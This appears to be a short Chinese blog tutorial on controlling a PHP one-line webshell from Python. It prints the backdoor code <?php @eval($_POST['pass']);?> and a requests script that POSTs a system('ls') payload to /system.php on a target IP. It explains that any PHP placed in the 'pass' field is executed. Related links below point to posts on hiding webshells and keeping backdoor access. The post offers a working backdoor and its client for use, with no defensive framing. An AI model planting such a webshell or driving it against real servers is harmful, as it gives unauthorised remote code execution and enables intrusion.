使用python鏈接一句話木馬的簡單操作

import requests
url="http://10.2.0.113"
shell='/system.php'
passwd="pass"
port='80'
payload={
    passwd:'system(\'ls \');'
}
url1=url+':'+port+shell
print(url1)
response=requests.post(url1,payload,timeout=1)
print(response.text)

原理是在<?php @eval($_POST['pass']);?>這樣的一句話木馬中,通過給pass這個(gè)值賦予內(nèi)容會(huì)在eval中被解析成php進(jìn)行執(zhí)行,只要通過post將php語法賦予pass就能在php環(huán)境中被執(zhí)行,這里執(zhí)行的是ls查看文件列表。

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • (源自摘抄整理)https://www.91ri.org/11494.html Webshell實(shí)現(xiàn)與隱藏探究 一...
    JackyTsuuuy閱讀 21,212評(píng)論 2 13
  • 在滲透測(cè)試的后期,為了維持權(quán)限。我們通常都會(huì)選擇使用大小馬或者通過添加賬戶等各種各樣的方式給自己留個(gè)后門。但是事情...
    自我陶醉閱讀 5,456評(píng)論 0 3
  • PHP代碼執(zhí)行函數(shù) eval & assert & preg_replace eval 函數(shù) php官方手冊(cè):ht...
    xaviershun閱讀 5,299評(píng)論 1 12
  • php.ini設(shè)置,上傳大文件: post_max_size = 128Mupload_max_filesize ...
    bycall閱讀 7,002評(píng)論 3 64
  • 今天早上7:48,老婆讓我摸她的肚子,已經(jīng)明顯地摸到了胎動(dòng),挺激動(dòng)的。確實(shí)三五天前也好像摸的到胎動(dòng),但是這次是非常...
    JimMeng閱讀 396評(píng)論 0 0

友情鏈接更多精彩內(nèi)容